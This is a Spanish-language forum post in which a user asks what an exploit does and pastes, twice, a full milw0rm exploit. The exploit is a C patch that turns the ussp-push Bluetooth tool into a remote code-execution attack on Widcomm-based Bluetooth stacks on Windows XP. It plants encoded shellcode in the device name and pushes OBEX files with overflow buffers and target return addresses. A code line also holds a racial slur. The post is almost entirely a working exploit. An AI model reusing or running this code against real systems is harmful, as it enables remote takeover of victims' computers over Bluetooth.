Autor
Alguien me podría decir que hace realmente este exploit?
Código:
#include "obex_socket.h"
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5
@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;
case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
name = remote;
name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.
buf = easy_readfile(path, &file_size);
if(buf == NULL) {
@@ -424,6 +434,24 @@
return err;
}
+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}
/*
* That's all there is to it. With it all setup like this all I have to do
@@ -434,19 +462,87 @@
int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}
- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5
@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;
case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
name = remote;
name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.
buf = easy_readfile(path, &file_size);
if(buf == NULL) {
@@ -424,6 +434,24 @@
return err;
}
+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}
/*
* That's all there is to it. With it all setup like this all I have to do
@@ -434,19 +462,87 @@
int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}
- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}
// milw0rm.com [2005-12-04]
Fuente: http://www.milw0rm.com/id.php?id=1357
Salu2
En línea
